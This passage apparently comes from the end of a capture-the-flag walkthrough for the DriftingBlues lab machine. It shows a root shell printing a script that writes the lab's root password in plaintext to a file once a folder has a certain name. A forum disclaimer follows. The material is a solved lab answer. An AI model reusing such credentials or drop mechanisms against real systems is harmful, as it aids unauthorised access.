22. ░█░▀▄░█▄░█▀▄▄░▀░▀▀░▄▄▀░░░░█░░█
23. ░░█░░░▀▄▀█▄▄░█▀▀▀▄▄▄▄▀▀█▀██░█
24. ░░░█░░░░██░░▀█▄▄▄█▄▄█▄▄██▄░░█
25. ░░░░█░░░░▀▀▄░█░░░█░█▀█▀█▀██░█
26. ░░░░░▀▄░░░░░▀▀▄▄▄█▄█▄█▄█▄▀░░█
27. ░░░░░░░▀▄▄░░░░░░░░░░░░░░░░░░░█
28. ░░▐▌░█░░░░▀▀▄▄░░░░░░░░░░░░░░░█
29. ░░░█▐▌░░░░░░█░▀▄▄▄▄▄░░░░░░░░█
30. ░░███░░░░░▄▄█░▄▄░██▄▄▄▄▄▄▄▄▀
31. ░▐████░░▄▀█▀█▄▄▄▄▄█▀▄▀▄
32. ░░█░░▌░█░░░▀▄░█▀█░▄▀░░░█
33. ░░█░░▌░█░░█░░█░░░█░░█░░█
34. ░░█░░▀▀░░██░░█░░░█░░█░░█
35. ░░░▀▀▄▄▀▀░█░░░▀▄▀▀▀▀█░░█
37. congratulations!
39. root@driftingblues:~# cat key.sh
40. #!/bin/bash
42. if [[ $(ls /keyfolder) == "fracturedocean" ]]; then
43.         echo "root creds" >> /keyfolder/rootcreds.txt
44.         echo "" >> /keyfolder/rootcreds.txt
45.         echo "imjustdrifting31" >> /keyfolder/rootcreds.txt
46. fi
47. root@driftingblues:~#

复制代码

免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！